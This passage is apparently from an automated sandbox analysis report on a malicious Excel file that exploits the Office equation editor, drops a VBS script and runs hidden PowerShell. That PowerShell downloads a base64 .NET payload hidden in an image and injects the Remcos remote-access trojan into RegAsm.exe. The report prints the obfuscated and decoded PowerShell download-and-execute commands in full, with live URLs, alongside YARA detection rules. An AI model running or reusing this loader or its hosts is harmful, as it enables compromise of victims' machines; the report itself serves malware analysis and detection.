8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004167B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0025549812_2_00255498
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_002551F012_2_002551F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043E0CC17_2_0043E0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041F0FA17_2_0041F0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045415917_2_00454159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043816817_2_00438168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004461F017_2_004461F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043E2FB17_2_0043E2FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0045332B17_2_0045332B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0042739D17_2_0042739D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004374E617_2_004374E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043E55817_2_0043E558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043877017_2_00438770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004378FE17_2_004378FE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043394617_2_00433946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044D9C917_2_0044D9C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00427A4617_2_00427A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041DB6217_2_0041DB62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00427BAF17_2_00427BAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00437D3317_2_00437D33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00435E5E17_2_00435E5E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00426E0E17_2_00426E0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043DE9D17_2_0043DE9D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00413FCA17_2_00413FCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00436FEA17_2_00436FEA
            Source: Ref19920830281982938RT.xlsOLE indicator, VBA macros: true
            Source: Ref19920830281982938RT.xlsStream path 'MBD001E4BEC/\x1Ole' : http://z2.ink/nLNGhKt{<%~)5s,wNcVbzaO2YFM6VhCzCTBQuiK9XvdfmZmfdi19qSykkuSoqGg13idxwqM80I2QlHhYka25mheOAqXWuc87241380C68jQ9775EUFqwHZcu07LqdVQvsltQ2jpPKnYENX8EPyVnwuWH5tio4C8sw95KTGoNtJFMIoavuLM7sBe84aUlir5LYkIQaJ3HtEUdylhd5rUhFbtEQgYfCE1ahMCmjRDB5e2;b?(Dz|l6j8RX)
            Source: ~WRF{8D0975D7-21A3-4DB8-9D99-C358C75C774D}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 12.2.powershell.exe.465ae68.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 12.2.powershell.exe.465ae68.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3508, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 3608, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: RegAsm.exe PID: 3972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9EAB33D.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winXLS@19/35@11/5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00417952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,17_2_0040F474
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_0041B4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\FE430000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7731.tmpJump to behavior
            Source: Ref19920830281982938RT.xlsOLE indicator, Workbook stream: true
            Source: FE430000.0.drOLE indicator, Workbook stream: true
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Ref19920830281982938RT.xlsVirustotal: Detection: 7%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.EWH/005001/451.871.64.891//:ptth' , '1' , 'C:\ProgramData\' , 'incontrovertido','RegAsm',''))} }"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\incontrovertido.vbs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\incontrovertido.vbs"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\onsandtigerbeautifulpicture.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTr